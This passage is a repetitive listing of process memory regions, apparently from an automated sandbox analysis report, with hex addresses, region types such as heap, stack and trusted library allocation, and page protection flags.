page read and write
|
||
375D000
|
trusted library allocation
|
page read and write
|
||
37B000
|
heap
|
page read and write
|
||
EC0000
|
unkown
|
page readonly
|
||
3F0000
|
heap
|
page read and write
|
||
480000
|
direct allocation
|
page read and write
|
||
298000
|
stack
|
page read and write
|
||
5C7000
|
heap
|
page read and write
|
||
18A000
|
trusted library allocation
|
page execute and read and write
|
||
2C2F000
|
trusted library allocation
|
page read and write
|
||
4F3E000
|
heap
|
page read and write
|
||
3A40000
|
trusted library allocation
|
page read and write
|
||
2795000
|
trusted library allocation
|
page read and write
|
||
1B2F0000
|
heap
|
page read and write
|
||
26A9000
|
trusted library allocation
|
page read and write
|
||
248B000
|
heap
|
page read and write
|
||
22F0000
|
heap
|
page read and write
|
||
51D4000
|
heap
|
page read and write
|
||
7FE892E0000
|
trusted library allocation
|
page read and write
|
||
525D000
|
heap
|
page read and write
|
||
1B41C000
|
stack
|
page read and write
|
||
35D3000
|
trusted library allocation
|
page read and write
|
||
7FE8AA16000
|
trusted library allocation
|
page execute and read and write
|
||
5335000
|
heap
|
page read and write
|
||
3D87000
|
heap
|
page read and write
|
||
47C2000
|
heap
|
page read and write
|
||
2735000
|
trusted library allocation
|
page read and write
|
||
616000
|
heap
|
page read and write
|
||
310000
|
heap
|
page read and write
|
||
4F43000
|
heap
|
page read and write
|
||
51A3000
|
heap
|
page read and write
|
||
3CDD000
|
stack
|
page read and write
|
||
4ECF000
|
heap
|
page read and write
|
||
4BE000
|
heap
|
page read and write
|
||
4AAF000
|
stack
|
page read and write
|
||
4EBC000
|
heap
|
page read and write
|
||
4F10000
|
heap
|
page read and write
|
||
3DB000
|
heap
|
page read and write
|
||
2A7F000
|
stack
|
page read and write
|
||
52C5000
|
heap
|
page read and write
|
||
45A9000
|
heap
|
page read and write
|
||
29C000
|
heap
|
page read and write
|
||
4F7000
|
heap
|
page read and write
|
||
34A000
|
trusted library allocation
|
page execute and read and write
|
||
7FE892B0000
|
trusted library allocation
|
page read and write
|
||
375D000
|
trusted library allocation
|
page read and write
|
||
52B1000
|
heap
|
page read and write
|
||
2A64000
|
heap
|
page read and write
|
||
3DAE000
|
heap
|
page read and write
|
||
48F9000
|
heap
|
page read and write
|
||
4301000
|
heap
|
page read and write
|
||
3D2F000
|
heap
|
page read and write
|
||
2793000
|
trusted library allocation
|
page read and write
|
||
3B90000
|
trusted library allocation
|
page read and write
|
||
4F1A000
|
heap
|
page read and write
|
||
436C000
|
heap
|
page read and write
|
||
38E000
|
heap
|
page read and write
|
||
354000
|
heap
|
page read and write
|
||
2C25000
|
trusted library allocation
|
page read and write
|
||
5729000
|
heap
|
page read and write
|
||
4D36000
|
heap
|
page read and write
|
||
22C000
|
heap
|
page read and write
|
||
330000
|
trusted library allocation
|
page read and write
|
||
5780000
|
heap
|
page read and write
|
||
359000
|
heap
|
page read and write
|
||
2C2D000
|
trusted library allocation
|
page read and write
|
||
7FE893E0000
|
trusted library allocation
|
page read and write
|
||
84E000
|
unkown
|
page read and write
|
||
440E000
|
stack
|
page read and write
|
||
2E1C000
|
stack
|
page read and write
|
||
C20000
|
heap
|
page read and write
|
||
5780000
|
heap
|
page read and write
|
||
26AF000
|
trusted library allocation
|
page read and write
|
||
2C51000
|
trusted library allocation
|
page read and write
|
||
385000
|
heap
|
page read and write
|
||
4F3E000
|
heap
|
page read and write
|
||
4F08000
|
heap
|
page read and write
|
||
37F000
|
heap
|
page read and write
|
||
37CC000
|
trusted library allocation
|
page read and write
|
||
3751000
|
trusted library allocation
|
page read and write
|
||
5FC000
|
heap
|
page read and write
|
||
27F000
|
stack
|
page read and write
|
||
276F000
|
trusted library allocation
|
page read and write
|
||
431E000
|
heap
|
page read and write
|
||
1182000
|
unkown
|
page execute read
|
||
2787000
|
trusted library allocation
|
page read and write
|
||
4F66000
|
heap
|
page read and write
|
||
25DA000
|
stack
|
page read and write
|
||
4F66000
|
heap
|
page read and write
|
||
397000
|
heap
|
page read and write
|
||
3D9B000
|
heap
|
page read and write
|
||
4F45000
|
heap
|
page read and write
|
||
3758000
|
trusted library allocation
|
page read and write
|
||
864F000
|
stack
|
page read and write
|
||
2737000
|
trusted library allocation
|
page read and write
|
||
3DD000
|
heap
|
page read and write
|
||
8B000
|
stack
|
page read and write
|
||
35F0000
|
trusted library allocation
|
page execute
|
||
12181000
|
trusted library allocation
|
page read and write
|
||
528D000
|
heap
|
page read and write
|
||
3D89000
|
heap
|
page read and write
|
||
5766000
|
heap
|
page read and write
|
||
857000
|
heap
|
page read and write
|
||
2C5A000
|
trusted library allocation
|
page read and write
|
||
4F10000
|
heap
|
page read and write
|
||
7E0D000
|
stack
|
page read and write
|
||
4F08000
|
heap
|
page read and write
|
||
F2E000
|
stack
|
page read and write | page guard
|
||
26D9000
|
trusted library allocation
|
page read and write
|
||
1F00000
|
heap
|
page read and write
|
||
3D7B000
|
heap
|
page read and write
|
||
3D87000
|
heap
|
page read and write
|
||
4F31000
|
heap
|
page read and write
|
||
2BC5000
|
heap
|
page read and write
|
||
2761000
|
trusted library allocation
|
page read and write
|
||
42F000
|
heap
|
page read and write
|
||
1A720000
|
heap
|
page execute and read and write
|
||
206F000
|
stack
|
page read and write
|
||
2755000
|
trusted library allocation
|
page read and write
|
||
35A000
|
heap
|
page read and write
|
||
5214000
|
heap
|
page read and write
|
||
4ED5000
|
heap
|
page read and write
|
||
7FE89130000
|
trusted library allocation
|
page read and write
|
||
3E1000
|
heap
|
page read and write
|
||
1F70000
|
direct allocation
|
page read and write
|
||
3DA0000
|
heap
|
page read and write
|
||
1E50000
|
heap
|
page read and write
|
||
2B8000
|
heap
|
page read and write
|
||
1B5BE000
|
stack
|
page read and write
|
||
4F0E000
|
heap
|
page read and write
|
||
B70000
|
trusted library allocation
|
page read and write
|
||
EC2000
|
unkown
|
page execute read
|
||
4F45000
|
heap
|
page read and write
|
||
81DE000
|
stack
|
page read and write
|
||
1B22E000
|
stack
|
page read and write
|
||
7D9F000
|
stack
|
page read and write
|
||
14A000
|
trusted library allocation
|
page execute and read and write
|
||
25C000
|
stack
|
page read and write
|
||
12D000
|
trusted library allocation
|
page execute and read and write
|
||
4F5B000
|
heap
|
page read and write
|
||
2C30000
|
trusted library allocation
|
page read and write
|
||
3D55000
|
heap
|
page read and write
|
||
26F9000
|
trusted library allocation
|
page read and write
|
||
7FE8AAF0000
|
trusted library allocation
|
page execute and read and write
|
||
7FE8AC80000
|
trusted library allocation
|
page read and write
|
||
3BE000
|
heap
|
page read and write
|
||
5290000
|
heap
|
page read and write
|
||
4F66000
|
heap
|
page read and write
|
||
4F2A000
|
heap
|
page read and write
|
||
3751000
|
trusted library allocation
|
page read and write
|
||
2D83000
|
trusted library allocation
|
page read and write
|
||
2DF0000
|
heap
|
page read and write
|
||
12280000
|
trusted library allocation
|
page read and write
|
||
7FE8A932000
|
trusted library allocation
|
page read and write
|
||
52AA000
|
heap
|
page read and write
|
||
3DA0000
|
heap
|
page read and write
|
||
5055000
|
heap
|
page read and write
|
||
4F05000
|
heap
|
page read and write
|
||
39C000
|
heap
|
page read and write
|
||
290000
|
heap
|
page read and write
|
||
39C0000
|
trusted library allocation
|
page read and write
|
||
26BB000
|
trusted library allocation
|
page read and write
|
||
539F000
|
heap
|
page read and write
|
||
1B0000
|
trusted library allocation
|
page read and write
|
||
5535000
|
heap
|
page read and write
|
||
2785000
|
trusted library allocation
|
page read and write
|
||
5A0000
|
heap
|
page read and write
|
||
58BE000
|
stack
|
page read and write
|
||
26A1000
|
trusted library allocation
|
page read and write
|
||
375D000
|
trusted library allocation
|
page read and write
|
||
38D000
|
heap
|
page read and write
|
||
3FA000
|
stack
|
page read and write
|
||
52A8000
|
heap
|
page read and write
|
||
192000
|
trusted library allocation
|
page read and write
|
||
5347000
|
heap
|
page read and write
|
||
3BF000
|
heap
|
page read and write
|
||
1A824000
|
heap
|
page read and write
|
||
3758000
|
trusted library allocation
|
page read and write
|
||
524A000
|
heap
|
page read and write
|
||
268F000
|
trusted library allocation
|
page read and write
|
||
26D7000
|
trusted library allocation
|
page read and write
|
||
4360000
|
trusted library section
|
page read and write
|
||
34E2000
|
trusted library allocation
|
page read and write
|
||
896E000
|
stack
|
page read and write
|
||
487000
|
direct allocation
|
page read and write
|
||
3DA0000
|
heap
|
page read and write
|
||
4F40000
|
heap
|
page read and write
|
||
590000
|
heap
|
page read and write
|
||
3453000
|
direct allocation
|
page read and write
|
||
5D4000
|
heap
|
page read and write
|
||
1B326000
|
heap
|
page read and write
|
||
4ED5000
|
heap
|
page read and write
|
||
1C36F000
|
stack
|
page read and write
|
||
1C2E6000
|
heap
|
page read and write
|
||
660000
|
heap
|
page read and write
|
||
4BE000
|
heap
|
page read and write
|
||
4F45000
|
heap
|
page read and write
|
||
7FE89310000
|
trusted library allocation
|
page read and write
|
||
370F000
|
trusted library allocation
|
page read and write
|
||
3D99000
|
heap
|
page read and write
|
||
2C32000
|
trusted library allocation
|
page read and write
|
||
3D9C000
|
heap
|
page read and write
|
||
3CEA000
|
heap
|
page read and write
|
||
51B0000
|
heap
|
page read and write
|
||
640000
|
heap
|
page read and write
|
||
4E3A000
|
heap
|
page read and write
|
||
3D37000
|
heap
|
page read and write
|
||
4F2F000
|
heap
|
page read and write
|
||
1ABCB000
|
stack
|
page read and write
|
||
363000
|
heap
|
page read and write
|
||
3763000
|
trusted library allocation
|
page read and write
|
||
270F000
|
trusted library allocation
|
page read and write
|
||
2C5D000
|
trusted library allocation
|
page read and write
|
||
2799000
|
trusted library allocation
|
page read and write
|
||
4F3A000
|
heap
|
page read and write
|
||
4D2000
|
heap
|
page read and write
|
||
4E65000
|
heap
|
page read and write
|
||
5736000
|
heap
|
page read and write
|
||
3A00000
|
trusted library allocation
|
page read and write
|
||
695000
|
heap
|
page read and write
|
||
261F000
|
stack
|
page read and write
|
||
2791000
|
trusted library allocation
|
page read and write
|
||
844E000
|
stack
|
page read and write
|
||
568E000
|
stack
|
page read and write
|
||
4F70000
|
heap
|
page execute and read and write
|
||
2693000
|
trusted library allocation
|
page read and write
|
||
7FE8A9E6000
|
trusted library allocation
|
page read and write
|
||
4E63000
|
heap
|
page read and write
|
||
180000
|
heap
|
page read and write
|
||
2779000
|
trusted library allocation
|
page read and write
|
||
35A000
|
heap
|
page read and write
|
||
1C49A000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
5C0000
|
heap
|
page read and write
|
||
2733000
|
trusted library allocation
|
page read and write
|
||
270000
|
heap
|
page read and write
|
||
48F3000
|
heap
|
page read and write
|
||
3E9000
|
heap
|
page read and write
|
||
529A000
|
heap
|
page read and write
|
||
4F47000
|
heap
|
page read and write
|
||
4E65000
|
heap
|
page read and write
|
||
2C32000
|
trusted library allocation
|
page read and write
|
||
375D000
|
trusted library allocation
|
page read and write
|
||
4F5B000
|
heap
|
page read and write
|
||
815E000
|
stack
|
page read and write
|
||
3EE000
|
heap
|
page read and write
|
||
4F66000
|
heap
|
page read and write
|
||
22C000
|
heap
|
page read and write
|
||
576A000
|
heap
|
page read and write
|
||
7FE8AB00000
|
trusted library allocation
|
page execute and read and write
|
||
3BE000
|
heap
|
page read and write
|
||
4DC1000
|
heap
|
page read and write
|
||
850000
|
heap
|
page read and write
|
||
52AF000
|
heap
|
page read and write
|
||
7FE89237000
|
trusted library allocation
|
page read and write
|
||
1A7A7000
|
heap
|
page read and write
|
||
4F2E000
|
heap
|
page read and write
|
||
279000
|
heap
|
page read and write
|
||
578D000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
1D0000
|
trusted library allocation
|
page read and write
|
||
4F10000
|
heap
|
page read and write
|
||
2C5D000
|
trusted library allocation
|
page read and write
|
||
35C000
|
heap
|
page read and write
|
||
182000
|
trusted library allocation
|
page read and write
|
||
4F0E000
|
heap
|
page read and write
|
||
512000
|
heap
|
page read and write
|
||
1C291000
|
heap
|
page read and write
|
||
1B5C0000
|
heap
|
page read and write
|
||
7FE8AAE7000
|
trusted library allocation
|
page read and write
|
||
550000
|
heap
|
page read and write
|
||
2F1F000
|
stack
|
page read and write
|
||
1C25F000
|
stack
|
page read and write
|
||
4B0000
|
heap
|
page read and write
|
||
4F0E000
|
heap
|
page read and write
|
||
52B0000
|
heap
|
page read and write
|
||
3D5A000
|
heap
|
page read and write
|
||
2F9000
|
heap
|
page read and write
|
||
4CF0000
|
heap
|
page read and write
|
||
576A000
|
heap
|
page read and write
|
||
322000
|
heap
|
page read and write
|
||
329000
|
heap
|
page read and write
|
||
34D3000
|
trusted library allocation
|
page read and write
|
||
627000
|
heap
|
page read and write
|
||
4EF000
|
stack
|
page read and write
|
||
2BAF000
|
stack
|
page read and write
|
||
475A000
|
heap
|
page read and write
|
||
1D00000
|
heap
|
page read and write
|
||
6A7000
|
heap
|
page read and write
|
||
51FC000
|
heap
|
page read and write
|
||
1A6BE000
|
heap
|
page execute and read and write
|
||
4AF1000
|
heap
|
page read and write
|
||
33A0000
|
direct allocation
|
page read and write
|
||
1D50000
|
heap
|
page read and write
|
||
7FCE000
|
stack
|
page read and write
|
||
21B000
|
heap
|
page read and write
|
||
109E000
|
stack
|
page read and write
|
||
42B9000
|
heap
|
page read and write
|
||
3CE8000
|
heap
|
page read and write
|
||
120000
|
trusted library allocation
|
page read and write
|
||
64B000
|
heap
|
page read and write
|
||
7E3E000
|
stack
|
page read and write
|
||
3505000
|
trusted library allocation
|
page read and write
|
||
552B000
|
heap
|
page read and write
|
||
26C9000
|
trusted library allocation
|
page read and write
|
||
7FE893B0000
|
trusted library allocation
|
page read and write
|
||
26CF000
|
trusted library allocation
|
page read and write
|
||
2675000
|
trusted library allocation
|
page read and write
|
||
35A000
|
heap
|
page read and write
|
||
4ED9000
|
heap
|
page read and write
|
||
27A3000
|
trusted library allocation
|
page read and write
|
||
32C000
|
heap
|
page read and write
|
||
7FE8AB30000
|
trusted library allocation
|
page read and write
|
||
51C000
|
stack
|
page read and write
|
||
1C480000
|
heap
|
page read and write
|
||
1D54000
|
heap
|
page read and write
|
||
5727000
|
heap
|
page read and write
|
||
1D90000
|
direct allocation
|
page read and write
|
||
27C0000
|
trusted library allocation
|
page read and write
|
||
7FE89360000
|
trusted library allocation
|
page read and write
|
||
1BA000
|
stack
|
page read and write
|
||
ED0000
|
heap
|
page read and write
|
||
3758000
|
trusted library allocation
|
page read and write
|
||
4F54000
|
heap
|
page read and write
|
||
7FE89330000
|
trusted library allocation
|
page read and write
|
||
2717000
|
trusted library allocation
|
page read and write
|
||
576D000
|
heap
|
page read and write
|
||
3D77000
|
heap
|
page read and write
|
||
7FE89300000
|
trusted library allocation
|
page read and write
|
||
17D000
|
trusted library allocation
|
page execute and read and write
|
||
51E8000
|
heap
|
page read and write
|
||
439F000
|
heap
|
page read and write
|
||
7FE8AC00000
|
trusted library allocation
|
page read and write
|
||
27CD000
|
trusted library allocation
|
page read and write
|
||
26A7000
|
trusted library allocation
|
page read and write
|
||
5772000
|
heap
|
page read and write
|
||
3751000
|
trusted library allocation
|
page read and write
|
||
5EE000
|
stack
|
page read and write
|
||
2679000
|
trusted library allocation
|
page read and write
|
||
3DE000
|
heap
|
page read and write
|
||
13D000
|
trusted library allocation
|
page execute and read and write
|
||
3E9000
|
heap
|
page read and write
|
||
4E06000
|
heap
|
page read and write
|
||
61E000
|
heap
|
page read and write
|
||
342000
|
trusted library allocation
|
page read and write
|
||
2C32000
|
trusted library allocation
|
page read and write
|
||
52A8000
|
heap
|
page read and write
|
||
27BD000
|
trusted library allocation
|
page read and write
|
||
5204000
|
heap
|
page read and write
|
||
31A1000
|
trusted library allocation
|
page read and write
|
||
4EFD000
|
heap
|
page read and write
|
||
2C52000
|
trusted library allocation
|
page read and write
|
||
2765000
|
trusted library allocation
|
page read and write
|
||
36B1000
|
trusted library allocation
|
page read and write
|
||
2747000
|
trusted library allocation
|
page read and write
|
||
7FE89090000
|
trusted library allocation
|
page read and write
|
||
EC0000
|
unkown
|
page readonly
|
||
1A7000
|
heap
|
page read and write
|
||
2800000
|
heap
|
page read and write
|
||
3B0000
|
heap
|
page read and write
|
||
278D000
|
trusted library allocation
|
page read and write
|
||
6FC000
|
stack
|
page read and write
|
||
5721000
|
heap
|
page read and write
|
||
2FC0000
|
trusted library allocation
|
page read and write
|
||
1B266000
|
heap
|
page read and write
|
||
5131000
|
heap
|
page read and write
|
||
3751000
|
trusted library allocation
|
page read and write
|
||
1B22E000
|
stack
|
page read and write
|
||
3D90000
|
heap
|
page read and write
|
||
4F39000
|
heap
|
page read and write
|
||
2C2D000
|
trusted library allocation
|
page read and write
|
||
3745000
|
trusted library allocation
|
page read and write
|
||
26EF000
|
trusted library allocation
|
page read and write
|
||
1FC4000
|
heap
|
page read and write
|
||
4F66000
|
heap
|
page read and write
|
||
578D000
|
heap
|
page read and write
|
||
7FE89233000
|
trusted library allocation
|
page read and write
|
||
3E0000
|
heap
|
page read and write
|
||
3DAE000
|
heap
|
page read and write
|
||
3758000
|
trusted library allocation
|
page read and write
|
||
4F1A000
|
heap
|
page read and write
|
||
1B2E4000
|
heap
|
page read and write
|
||
4A72000
|
heap
|
page read and write
|
||
2EE000
|
heap
|
page read and write
|
||
7FE8AC30000
|
trusted library allocation
|
page read and write
|
||
48F4000
|
heap
|
page read and write
|
||
48F0000
|
heap
|
page read and write
|
||
43D1000
|
trusted library allocation
|
page read and write
|
||
7FE8AC40000
|
trusted library allocation
|
page read and write
|
||
5BD000
|
heap
|
page read and write
|
||
4BDE000
|
heap
|
page read and write
|
||
4D4C000
|
heap
|
page read and write
|
||
7FE89083000
|
trusted library allocation
|
page execute and read and write
|
||
4F66000
|
heap
|
page read and write
|
||
3CE8000
|
heap
|
page read and write
|
||
7D4E000
|
stack
|
page read and write
|
||
2C5A000
|
trusted library allocation
|
page read and write
|
||
3DC000
|
heap
|
page read and write
|
||
7FE8AC70000
|
trusted library allocation
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
2271000
|
trusted library allocation
|
page read and write
|
||
385000
|
heap
|
page read and write
|
||
4834000
|
heap
|
page read and write
|
||
800E000
|
stack
|
page read and write
|
||
7FE89284000
|
trusted library allocation
|
page read and write
|
||
4F24000
|
heap
|
page read and write
|
||
2613000
|
trusted library allocation
|
page read and write
|
||
62D000
|
heap
|
page read and write
|
||
3751000
|
trusted library allocation
|
page read and write
|
||
4D89000
|
heap
|
page read and write
|
||
337C000
|
stack
|
page read and write
|
||
710000
|
heap
|
page read and write
|
||
4F1A000
|
heap
|
page read and write
|
||
2452000
|
trusted library allocation
|
page read and write
|
||
2C4A000
|
trusted library allocation
|
page read and write
|
||
42AC000
|
heap
|
page read and write
|
||
1C43B000
|
stack
|
page read and write
|
||
2783000
|
trusted library allocation
|
page read and write
|
||
568C000
|
heap
|
page read and write
|
||
5764000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
56DE000
|
stack
|
page read and write
|
||
852E000
|
stack
|
page read and write
|
||
3D9E000
|
heap
|
page read and write
|
||
4ED7000
|
heap
|
page read and write
|
||
170000
|
trusted library allocation
|
page read and write
|
||
1F77000
|
direct allocation
|
page read and write
|
||
4F45000
|
heap
|
page read and write
|
||
49F000
|
remote allocation
|
page execute and read and write
|
||
5335000
|
heap
|
page read and write
|
||
31C000
|
heap
|
page read and write
|
||
52A4000
|
heap
|
page read and write
|
||
5764000
|
heap
|
page read and write
|
||
170000
|
trusted library allocation
|
page read and write
|
||
53D0000
|
heap
|
page read and write
|
||
193000
|
stack
|
page read and write
|
||
A50000
|
trusted library allocation
|
page execute and read and write
|
||
4701000
|
heap
|
page read and write
|
||
934000
|
heap
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
550E000
|
stack
|
page read and write
|
||
69B000
|
heap
|
page read and write
|
||
5772000
|
heap
|
page read and write
|
||
2713000
|
trusted library allocation
|
page read and write
|
||
34D5000
|
trusted library allocation
|
page read and write
|
||
4F3E000
|
heap
|
page read and write
|
||
899E000
|
stack
|
page read and write | page guard
|
||
3D79000
|
heap
|
page read and write
|
||
21DE000
|
stack
|
page read and write
|
||
26DB000
|
trusted library allocation
|
page read and write
|
||
4836000
|
heap
|
page read and write
|
||
2753000
|
trusted library allocation
|
page read and write
|
||
38F000
|
heap
|
page read and write
|
||
4DCD000
|
heap
|
page read and write
|
||
26E5000
|
trusted library allocation
|
page read and write
|
||
273D000
|
trusted library allocation
|
page read and write
|
||
1EC0000
|
direct allocation
|
page read and write
|
||
4E31000
|
heap
|
page read and write
|
||
3632000
|
trusted library allocation
|
page read and write
|
||
3D55000
|
heap
|
page read and write
|
||
25C3000
|
trusted library allocation
|
page read and write
|
||
48F9000
|
heap
|
page read and write
|
||
3D42000
|
heap
|
page read and write
|
||
7FE8AAD0000
|
trusted library allocation
|
page read and write
|
||
22C000
|
heap
|
page read and write
|
||
3D5C000
|
heap
|
page read and write
|
||
432C000
|
heap
|
page read and write
|
||
39BF000
|
stack
|
page read and write
|
||
490000
|
heap
|
page read and write
|
||
4F43000
|
heap
|
page read and write
|
||
26B5000
|
trusted library allocation
|
page read and write
|
||
52A8000
|
heap
|
page read and write
|
||
7FE8AB34000
|
trusted library allocation
|
page read and write
|
||
7FE8AB14000
|
trusted library allocation
|
page read and write
|
||
4F24000
|
heap
|
page read and write
|
||
23F000
|
stack
|
page read and write
|
||
4F7000
|
heap
|
page read and write
|
||
124000
|
heap
|
page read and write
|
||
4A1F000
|
stack
|
page read and write
|
||
290000
|
heap
|
page read and write
|
||
3745000
|
trusted library allocation
|
page read and write
|
||
1DC000
|
stack
|
page read and write
|
||
7FE8A9F0000
|
trusted library allocation
|
page execute and read and write
|
||
38A000
|
heap
|
page read and write
|
||
38D000
|
heap
|
page read and write
|
||
3DAF000
|
heap
|
page read and write
|
||
5F6000
|
heap
|
page read and write
|
||
4701000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
355000
|
heap
|
page read and write
|
||
4F49000
|
heap
|
page read and write
|
||
2361000
|
trusted library allocation
|
page read and write
|
||
271F000
|
trusted library allocation
|
page read and write
|
||
897000
|
heap
|
page read and write
|
||
4F3E000
|
heap
|
page read and write
|
||
3751000
|
trusted library allocation
|
page read and write
|
||
4EBC000
|
heap
|
page read and write
|
||
7FE8AB50000
|
trusted library allocation
|
page read and write
|
||
35FD000
|
trusted library allocation
|
page read and write
|
||
5770000
|
heap
|
page read and write
|
||
273000
|
heap
|
page read and write
|
||
52AA000
|
heap
|
page read and write
|
||
432F000
|
heap
|
page read and write
|
||
512000
|
heap
|
page read and write
|
||
38A000
|
heap
|
page read and write
|
||
4F54000
|
heap
|
page read and write
|
||
2C2D000
|
trusted library allocation
|
page read and write
|
||
4F3E000
|
heap
|
page read and write
|
||
55A0000
|
heap
|
page read and write
|
||
BCF000
|
stack
|
page read and write
|
||
7FE8AB80000
|
trusted library allocation
|
page read and write
|
||
489E000
|
stack
|
page read and write
|
||
5239000
|
heap
|
page read and write
|
||
500000
|
trusted library allocation
|
page read and write
|
||
3758000
|
trusted library allocation
|
page read and write
|
||
2581000
|
trusted library allocation
|
page read and write
|
||
18B000
|
stack
|
page read and write
|
||
3AB000
|
heap
|
page read and write
|
||
3CBC000
|
heap
|
page read and write
|
||
2CE000
|
stack
|
page read and write
|
||
2C5A000
|
trusted library allocation
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
26D5000
|
trusted library allocation
|
page read and write
|
||
3440000
|
direct allocation
|
page read and write
|
||
4E50000
|
heap
|
page execute and read and write
|
||
116000
|
heap
|
page read and write
|
||
DEE000
|
stack
|
page read and write
|
||
3D2F000
|
heap
|
page read and write
|
||
7FE89380000
|
trusted library allocation
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
34D7000
|
trusted library allocation
|
page read and write
|
||
3BE000
|
heap
|
page read and write
|
||
850000
|
heap
|
page read and write
|
||
7D0000
|
heap
|
page read and write
|
||
7FE8AC50000
|
trusted library allocation
|
page read and write
|
||
5277000
|
heap
|
page read and write
|
||
142000
|
heap
|
page read and write
|
||
2741000
|
trusted library allocation
|
page read and write
|
||
3745000
|
trusted library allocation
|
page read and write
|
||
4F05000
|
heap
|
page read and write
|
||
4D74000
|
heap
|
page read and write
|
||
553C000
|
heap
|
page read and write
|
||
39C000
|
heap
|
page read and write
|
||
4F5B000
|
heap
|
page read and write
|
||
273B000
|
trusted library allocation
|
page read and write
|
||
4110000
|
trusted library allocation
|
page read and write
|
||
7D9000
|
heap
|
page read and write
|
||
275B000
|
trusted library allocation
|
page read and write
|
||
429F000
|
stack
|
page read and write
|
||
1C5B000
|
heap
|
page read and write
|
||
240000
|
heap
|
page read and write
|
||
4ECF000
|
heap
|
page read and write
|
||
22A0000
|
trusted library allocation
|
page execute read
|
||
670000
|
heap
|
page read and write
|
||
2741000
|
trusted library allocation
|
page read and write
|
||
1C501000
|
heap
|
page read and write
|
||
3D97000
|
heap
|
page read and write
|
||
5734000
|
heap
|
page read and write
|
||
38A000
|
heap
|
page read and write
|
||
740000
|
heap
|
page read and write
|
||
48F9000
|
heap
|
page read and write
|
||
2EF000
|
heap
|
page read and write
|
||
2C29000
|
trusted library allocation
|
page read and write
|
||
273F000
|
trusted library allocation
|
page read and write
|
||
268B000
|
trusted library allocation
|
page read and write
|
||
30B0000
|
trusted library allocation
|
page execute
|
||
7FE89262000
|
trusted library allocation
|
page read and write
|
||
1D60000
|
heap
|
page read and write
|
||
4F49000
|
heap
|
page read and write
|
||
373F000
|
trusted library allocation
|
page read and write
|
||
4F03000
|
heap
|
page read and write
|
||
4EAE000
|
stack
|
page read and write
|
||
12190000
|
trusted library allocation
|
page read and write
|
||
7FE8ABE0000
|
trusted library allocation
|
page read and write
|
||
49F000
|
heap
|
page read and write
|
||
5688000
|
heap
|
page read and write
|
||
4F54000
|
heap
|
page read and write
|
||
5AA000
|
heap
|
page read and write
|
||
7FFFFF00000
|
trusted library allocation
|
page execute and read and write
|
||
7FE8AB20000
|
trusted library allocation
|
page execute and read and write
|
||
123000
|
trusted library allocation
|
page execute and read and write
|
||
120000
|
trusted library allocation
|
page read and write
|
||
4733000
|
heap
|
page read and write
|
||
26C7000
|
trusted library allocation
|
page read and write
|
||
578D000
|
heap
|
page read and write
|
||
2745000
|
trusted library allocation
|
page read and write
|
||
44CE000
|
stack
|
page read and write
|
||
270D000
|
trusted library allocation
|
page read and write
|
||
2751000
|
trusted library allocation
|
page read and write
|
||
81AE000
|
stack
|
page read and write
|
||
380000
|
trusted library allocation
|
page read and write
|
||
220000
|
trusted library allocation
|
page read and write
|
||
1A999000
|
stack
|
page read and write
|
||
37DC000
|
trusted library allocation
|
page read and write
|
||
4F47000
|
heap
|
page read and write
|
||
4B75000
|
heap
|
page read and write
|
||
270F000
|
stack
|
page read and write
|
||
7FE8AC90000
|
trusted library allocation
|
page read and write
|
||
E2F000
|
stack
|
page read and write
|
||
7FE8ABB0000
|
trusted library allocation
|
page read and write
|
||
1AFB0000
|
heap
|
page read and write
|
||
85AE000
|
stack
|
page read and write | page guard
|
||
1AC58000
|
stack
|
page read and write
|
||
3E9000
|
heap
|
page read and write
|
||
4F45000
|
heap
|
page read and write
|
||
3662000
|
trusted library allocation
|
page read and write
|
||
1CB6C000
|
stack
|
page read and write
|
||
260000
|
heap
|
page read and write
|
||
4F24000
|
heap
|
page read and write
|
||
3751000
|
trusted library allocation
|
page read and write
|
||
4E6C000
|
heap
|
page read and write
|
||
58E000
|
stack
|
page read and write
|
||
266E000
|
trusted library allocation
|
page read and write
|
||
385000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
3D55000
|
heap
|
page read and write
|
||
4E3D000
|
stack
|
page read and write
|
||
840000
|
heap
|
page read and write
|
||
7FE8AC20000
|
trusted library allocation
|
page read and write
|
||
1AB28000
|
stack
|
page read and write
|
||
437D000
|
heap
|
page read and write
|
||
3751000
|
trusted library allocation
|
page read and write
|
||
875E000
|
stack
|
page read and write
|
||
4F10000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
3652000
|
trusted library allocation
|
page read and write
|
||
4D73000
|
heap
|
page read and write
|
||
1A680000
|
heap
|
page execute and read and write
|
||
277F000
|
trusted library allocation
|
page read and write
|
||
269B000
|
trusted library allocation
|
page read and write
|
||
3690000
|
heap
|
page read and write
|
||
4E90000
|
heap
|
page read and write
|
||
3130000
|
heap
|
page read and write
|
||
2785000
|
trusted library allocation
|
page read and write
|
||
1DB000
|
stack
|
page read and write
|
||
4F54000
|
heap
|
page read and write
|
||
422000
|
heap
|
page read and write
|
||
4F54000
|
heap
|
page read and write
|
||
7FFFFF00000
|
trusted library allocation
|
page execute and read and write
|
||
5298000
|
heap
|
page read and write
|
||
38E000
|
heap
|
page read and write
|
||
2C55000
|
trusted library allocation
|
page read and write
|
||
1B399000
|
heap
|
page read and write
|
||
4D74000
|
heap
|
page read and write
|
||
7FE89250000
|
trusted library allocation
|
page execute and read and write
|
||
1A89F000
|
heap
|
page read and write
|
||
ED4000
|
heap
|
page read and write
|
||
3DE000
|
heap
|
page read and write
|
||
49F000
|
direct allocation
|
page read and write
|
||
4AC000
|
heap
|
page read and write
|
||
5204000
|
heap
|
page read and write
|
||
2727000
|
trusted library allocation
|
page read and write
|
||
515E000
|
stack
|
page read and write
|
||
2C21000
|
trusted library allocation
|
page read and write
|
||
48F3000
|
heap
|
page read and write
|
||
55C7000
|
heap
|
page read and write
|
||
2619000
|
trusted library allocation
|
page read and write
|
||
42FF000
|
heap
|
page read and write
|
||
7FE8AB70000
|
trusted library allocation
|
page read and write
|
||
396000
|
heap
|
page read and write
|
||
38F000
|
heap
|
page read and write
|
||
2B10000
|
trusted library allocation
|
page execute read
|
||
521E000
|
stack
|
page read and write
|
||
4EDB000
|
heap
|
page read and write
|
